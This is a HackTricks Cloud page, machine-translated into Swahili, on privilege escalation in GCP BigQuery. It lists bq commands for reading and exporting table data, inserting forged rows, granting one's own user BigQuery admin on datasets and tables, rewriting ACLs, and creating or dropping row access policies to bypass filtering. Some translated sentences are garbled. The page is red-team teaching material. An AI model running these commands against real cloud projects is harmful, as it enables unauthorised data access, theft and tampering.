GCP - BigQuery Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

BigQuery

Kwa maelezo zaidi kuhusu BigQuery angalia:

GCP - Bigquery Enum

Read Table

Kusoma taarifa zilizohifadhiwa ndani ya meza ya BigQuery inaweza kuwa inawezekana kupata taarifa nyeti. Ili kufikia taarifa hizo ruhusa inayohitajika ni bigquery.tables.get, bigquery.jobs.create na bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

Hii ni njia nyingine ya kufikia data. Ihamashe kwenye hifadhi ya wingu na pakua faili zenye taarifa. Ili kutekeleza hatua hii, ruhusa zifuatazo zinahitajika: bigquery.tables.export, bigquery.jobs.create na storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

Inaweza kuwa inawezekana kuingiza data fulani za kuaminika katika jedwali la Bigquery ili kutumia udhaifu mahali pengine. Hii inaweza kufanywa kwa urahisi na ruhusa bigquery.tables.get, bigquery.tables.updateData na bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

Mshambuliaji anaweza kutumia ruhusa hii kujipe ruhusa zaidi juu ya dataset ya BigQuery:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Ruhusa hii pekee inaruhusu kusaidia upya ufikiaji wako juu ya dataset ya BigQuery kwa kubadilisha ACLs zinazoonyesha nani anaweza kuipata:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

Mshambuliaji anaweza kutumia ruhusa hii kujipe ruhusa zaidi juu ya meza ya BigQuery:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Kulingana na nyaraka, kwa ruhusa zilizotajwa inawezekana kusaidia sera ya safu. Hata hivyo, ukitumia cli bq unahitaji zaidi: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Ni rahisi kupata kitambulisho cha chujio katika matokeo ya uainishaji wa sera za safu. Mfano:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Ikiwa una bigquery.rowAccessPolicies.delete badala ya bigquery.rowAccessPolicies.update unaweza pia kufuta sera hiyo:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Chaguo kingine kinachoweza kupita sera za ufikiaji wa safu ni kubadilisha tu thamani ya data iliyozuiliwa. Ikiwa unaweza kuona tu wakati term ni Cfba, badilisha rekodi zote za jedwali kuwa na term = "Cfba". Hata hivyo, hii inazuia na bigquery.

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki hila za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousGCP - Batch Privesc NextGCP - ClientAuthConfig Privesc

Last updated 1 month ago

BigQuery

Read Table

Export data

Insert data

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`